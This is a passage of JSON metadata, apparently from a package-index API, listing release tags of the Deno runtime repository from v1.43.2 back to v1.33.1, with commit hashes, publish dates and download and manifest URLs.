acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","ki